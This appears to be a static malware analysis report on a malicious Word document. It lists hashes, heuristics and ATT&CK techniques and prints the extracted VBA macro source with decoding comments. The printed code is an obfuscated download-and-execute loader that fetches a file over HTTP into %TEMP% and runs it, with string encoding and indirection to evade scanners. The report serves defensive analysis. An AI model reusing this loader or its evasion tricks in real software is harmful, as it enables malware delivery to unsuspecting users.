Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ea1e1c586e38d1b…

MALICIOUS

Office (OLE)

57.5 KB Created: 2016-10-18 09:34:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: 1081d2b66b0147ae4c7d6f5aab486f81 SHA-1: a495123f9fe0d7cf2375b1de6dcafffb28418499 SHA-256: 0ea1e1c586e38d1bd9cf5a7c11c5bad4ec8dec78e679660ee24a1196304982c6
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. Every string literal in the extracted source passes through one decoder routine (`LvEaAQLfcpSl`); read as "reverse the string and subtract 1 from each character code" it yields the ProgIDs `MSXML2.ServerXMLHTTP.6.0`, `ADODB.Stream`, `Scripting.FileSystemObject` and `WScript.Shell` and the member names `Open`/`Send`/`Status`/`ResponseBody`/`Type`/`Write`/`Exec`/`Run`, all invoked through `CreateObject` and `CallByName` so that no ProgID, method name or URL appears literally in the macro text. The decoded chain is a plain downloader: HTTP GET of a caller-supplied URL (the URL itself is not among the literals in the previewed source), abort unless the status is 200, write the binary response body to a file under the temp folder (`GetSpecialFolder(2)` & "/" & `Rnd`), then launch it via `WScript.Shell.Exec`. Intermediate subs reach one another through `Application.Run` on decoded macro names, which also hides the call graph from simple static analysis; the `Document_Open` entry point reported by the OLE_VBA_DOCOPEN heuristic lies outside the truncated preview. The obfuscation and auto-execution mechanism strongly suggest a malicious downloader; note that the 200-status check means a sandbox without network access (or a dead download host) will produce no dropped file.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard OOXML DrawingML namespace identifier found in ordinary Office files, not a download location; the downloader's target URL is passed in as a parameter (`XpglqKjlfkLP`) from a caller outside the previewed macro source and does not appear as a literal here.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5138 bytes
SHA-256: 59142d27ddb2e923ce1f63193e9ef5a96c698f33227bdbe02f26ab70095c0225
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Downloader core: fetches XpglqKjlfkLP (a URL) over HTTP and hands the raw
' response bytes to an ADODB.Stream that is written to the path FoxjWhXVhRRv.
' Returns True on success; False if any step raises an error or the HTTP
' status is not 200. Every literal below is passed through LvEaAQLfcpSl; the
' decoded values noted here assume that routine reverses the string and
' subtracts 1 from each character code (its NVWkzqvezZgf helper is not in
' this excerpt, so confirm against the full module).
Private Function ghNCtWppVfZx(ByVal XpglqKjlfkLP As String, ByVal FoxjWhXVhRRv As String) As Boolean
Dim dHUvpLIBxbje As Object
Dim cDAtmgMwzifd As Variant
Dim uwYXZGZbVSYh As Integer
Dim FJIvzFapPoxp As Object
Dim AvNgMWAdFAwJ As String
On Error GoTo pZTjEVAdkvWl
' Decodes to "MSXML2.ServerXMLHTTP.6.0".
' NOTE(review): ServerXMLHTTP is the WinHTTP-backed client, so it will not
' pick up per-user IE proxy settings -- relevant when detonating behind a proxy.
AvNgMWAdFAwJ = LvEaAQLfcpSl("1/7/QUUIMNYsfwsfT/3MNYTN")
Set FJIvzFapPoxp = CreateObject(AvNgMWAdFAwJ)
' .Open "GET", url, False  (CallType 1 = VbMethod; synchronous request)
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("ofqP"), 1, LvEaAQLfcpSl("UFH"), XpglqKjlfkLP, False
' .Send
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("eofT"), 1
' .Status  (CallType 2 = VbGet)
uwYXZGZbVSYh = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("tvubuT"), 2)
' 100 + 100 = 200. Anything other than HTTP 200 bails out, so an offline
' sandbox or a taken-down host yields no dropped file and no Exec.
If uwYXZGZbVSYh <> 100 + 100 Then
GoTo pZTjEVAdkvWl
End If
' .ResponseBody -- the raw bytes of the second stage
cDAtmgMwzifd = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("zepCftopqtfS"), 2)
' Decodes to "ADODB.Stream".
Set dHUvpLIBxbje = CreateObject(LvEaAQLfcpSl("nbfsuT/CEPEB"))
' The stream setup/write-out is spread over one-line helpers so no single
' routine contains the full sequence: set Type, Open, Write(bytes), then two
' helpers taking (stream, path) and (stream) -- presumably SaveToFile and
' Close, but neither body is inside this excerpt.
KgmBwNiAFOKP dHUvpLIBxbje
xYheJuZKfaQv dHUvpLIBxbje
awGBIfgvjbAc dHUvpLIBxbje, cDAtmgMwzifd
DsIbCsAMYYQK dHUvpLIBxbje, FoxjWhXVhRRv
PdLDSioJAVSH dHUvpLIBxbje
ghNCtWppVfZx = True
Exit Function
pZTjEVAdkvWl:
' Any runtime error (COM instantiation blocked, network failure, ...) lands here.
ghNCtWppVfZx = False
End Function

' Returns the decoded member name used for the Application.Run calls below.
' "ovS" decodes to "Run" under the reverse-and-decrement reading of LvEaAQLfcpSl.
Private Function IIzjPkemqqnL()
IIzjPkemqqnL = LvEaAQLfcpSl("ovS")
End Function

' Stream helper: sets uKFgvPVMydzM.Type = 1.
' "fqzU" decodes to "Type"; CallType 4 = VbLet (property assignment).
' A Type of 1 is adTypeBinary in ADO, i.e. the stream will hold raw bytes.
Private Sub KgmBwNiAFOKP(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fqzU"), 4, 1
End Sub

' Builds the drop path for the downloaded payload:
'   <temp folder> & "/" & Rnd
' Returns "" if the special-folder lookup yields an empty string.
' Decoded literals (reverse-and-decrement reading of LvEaAQLfcpSl):
'   "udfkcPnfutzTfmjG/hojuqjsdT" -> "Scripting.FileSystemObject"
'   "sfempGmbjdfqTufH"           -> "GetSpecialFolder"
'   "0"                          -> "/"
Private Function KPKaiNEnahVT() As String
Dim rJrhievvCfyl As Object
Dim QXTQfpZtKexX As String
Dim SHgDlrOjRXLV
SHgDlrOjRXLV = LvEaAQLfcpSl("udfkcPnfutzTfmjG/hojuqjsdT")
Set rJrhievvCfyl = CreateObject(SHgDlrOjRXLV)
SHgDlrOjRXLV = LvEaAQLfcpSl("sfempGmbjdfqTufH")
' GetSpecialFolder(2): 2 is TemporaryFolder in the FileSystemObject enum,
' so the payload lands in %TEMP%.
QXTQfpZtKexX = CallByName(rJrhievvCfyl, SHgDlrOjRXLV, VbMethod, 2)
If QXTQfpZtKexX <> "" Then
' File name is a bare Rnd value with no extension. NOTE(review): no
' Randomize call is visible in this excerpt, so the VBA default seed may
' make this name repeat across runs -- check dropped-file names in the sandbox.
KPKaiNEnahVT = QXTQfpZtKexX & LvEaAQLfcpSl("0") & Rnd
End If
End Function

' Hand-rolled Len(): walks LWZLTNNGxYir one character at a time until Mid
' returns "" and returns the count. Presumably written this way to keep the
' Len token out of the macro (used only by the string decoder).
Private Function FiqyDLoZMATY(ByVal LWZLTNNGxYir As String) As Integer
Dim JRtxRzUKmPqn
JRtxRzUKmPqn = 1
While Mid(LWZLTNNGxYir, JRtxRzUKmPqn, 1) <> ""
JRtxRzUKmPqn = JRtxRzUKmPqn + 1
Wend
FiqyDLoZMATY = JRtxRzUKmPqn - 1
End Function

' Download-and-execute orchestrator. XpglqKjlfkLP is the payload URL; the
' caller that supplies it is not within this excerpt.
' Sequence: build a %TEMP% drop path, download the URL into it, then
' WScript.Shell.Exec the file.
' Decoded literals (reverse-and-decrement reading of LvEaAQLfcpSl):
'   "mmfiT/uqjsdTX" -> "WScript.Shell"
'   "dfyF"          -> "Exec"
Private Sub zPfxwgLIQVwW(ByVal XpglqKjlfkLP As String)
Dim lyvRMzbxdroI As String
Dim VbVQyuDWGZld As Object
Dim xKPXWuUjiAdg
On Error GoTo pZTjEVAdkvWl
lyvRMzbxdroI = KPKaiNEnahVT
' The Boolean result of the download is discarded: on failure the Exec
' below is still attempted and its error is swallowed by the handler.
ghNCtWppVfZx XpglqKjlfkLP, lyvRMzbxdroI
xKPXWuUjiAdg = LvEaAQLfcpSl("mmfiT/uqjsdTX")
Set VbVQyuDWGZld = CreateObject(xKPXWuUjiAdg)
' .Exec <drop path>  (CallType 1 = VbMethod) -- the execution sink.
CallByName VbVQyuDWGZld, LvEaAQLfcpSl("dfyF"), 1, lyvRMzbxdroI
Exit Sub
pZTjEVAdkvWl:
' Empty handler: every error is silently discarded, so a blocked COM object
' or a missing file produces no visible symptom for the user.
End Sub

' Stream helper: uKFgvPVMydzM.Write DDPDWEuozhSo (the HTTP response bytes).
' "fujsX" decodes to "Write"; CallType 1 = VbMethod.
Private Sub awGBIfgvjbAc(ByVal uKFgvPVMydzM As Variant, ByVal DDPDWEuozhSo As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fujsX"), 1, DDPDWEuozhSo
End Sub

' Indirection hop: Application.Run "<decoded macro name>".
' "eJguiOnRphWC" decodes to "BVgoQmNhtfId" under the reverse-and-decrement
' reading of LvEaAQLfcpSl; no routine by that name is inside this excerpt,
' so the next link of the chain (presumably the one that supplies the URL to
' zPfxwgLIQVwW) must be recovered from the full module. Calling macros by
' decoded name via Application.Run keeps the call graph invisible to a
' static pass that only follows direct calls. The return value is unused.
Private Sub vzJhVatEBVoy()
Dim VeiNJzUrDrDg
Dim jJBTFGDHthQs
Dim JQOckBcjjlel
VeiNJzUrDrDg = LvEaAQLfcpSl("eJguiOnRphWC")
JQOckBcjjlel = IIzjPkemqqnL
jJBTFGDHthQs = CallByName(Application, JQOckBcjjlel, VbMethod, VeiNJzUrDrDg)
End Sub

' String decoder used for every ProgID, member name and macro name in this
' module. For each position i it takes NVWkzqvezZgf(s, i) - 1, converts it
' with Chr, and PREPENDS it to the result, so the output is reversed relative
' to the input. NVWkzqvezZgf is not in this excerpt; if it is Asc(Mid(s, i, 1))
' -- consistent with every literal in the module decoding to a valid COM
' name (e.g. "ofqP" -> "Open", "ovS" -> "Run") -- the scheme is simply
' "reverse, then subtract 1 from each character code". Confirm against the
' full module before relying on the decoded values.
Private Function LvEaAQLfcpSl(ByVal lrgPbThREpKm As String) As String
Dim aaZFeTqSvrER As Integer
Dim AnBobeUQDpDD As String
LvEaAQLfcpSl = ""
' FiqyDLoZMATY is the module's hand-rolled Len().
For aaZFeTqSvrER = 1 To FiqyDLoZMATY(lrgPbThREpKm)
AnBobeUQDpDD = Chr(NVWkzqvezZgf(lrgPbThREpKm, aaZFeTqSvrER) - 1)
' Prepending reverses the string as it is rebuilt.
LvEaAQLfcpSl = AnBobeUQDpDD & LvEaAQLfcpSl
Next aaZFeTqSvrER
End Function

' Stream helper: eqSYWaSfWYQK.Open (no arguments).
' "ofqP" decodes to "Open"; CallType 1 = VbMethod.
Private Sub xYheJuZKfaQv(ByVal eqSYWaSfWYQK As Variant)
CallByName eqSYWaSfWYQK, LvEaAQLfcpSl("ofqP"), 1
End Sub

' Indirection hop: Application.Run "vzJhVatEBVoy".
' "zpWCFubWiK{w" decodes to "vzJhVatEBVoy" under the reverse-and-decrement
' reading of LvEaAQLfcpSl, i.e. the sub defined above in this module; the
' target name is only ever present in decoded form. Return value unused.
Private Sub CPSnyVKvrvnG()
Dim YTRFoEHLxOEW
Dim OHBcICEmNbzK
Dim uTnRUWANbrxQ
uTnRUWANbrxQ = IIzjPkemqqnL
YTRFoEHLxOEW = LvEaAQLfcpSl("zpWCFubWiK{w")
OHBcICEmNbzK = CallByName(Application, uTnRUWANbrxQ, VbMethod, YTRFoEHLxOEW)
End Sub

' Indirection hop: Application.Run "CPSnyVKvrvnG".
' "HowswLWzoTQD" decodes to "CPSnyVKvrvnG" under the reverse-and-decrement
' reading of LvEaAQLfcpSl. Together with the two hops above this gives the
' chain SsoTJTiTYzij -> CPSnyVKvrvnG -> vzJhVatEBVoy -> "BVgoQmNhtfId"
' (not in this excerpt); whatever auto-exec entry point (Document_Open per
' the heuristics) starts the chain is also outside the preview. Return
' value unused.
Private Sub SsoTJTiTYzij()
Dim FbufXBvHPPwJ
Dim xRqqKnhlVdEi
Dim AgVQNZUXlDyD
AgVQNZUXlDyD = IIzjPkemqqnL
FbufXBvHPPwJ = LvEaAQLfcpSl("HowswLWzoTQD")
xRqqKnhlVdEi = CallByName(Application, AgVQNZUXlDyD, VbMethod, FbufXBvHPPwJ)
End Sub

Private Sub PdLDSioJAVSH(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpS
... (truncated)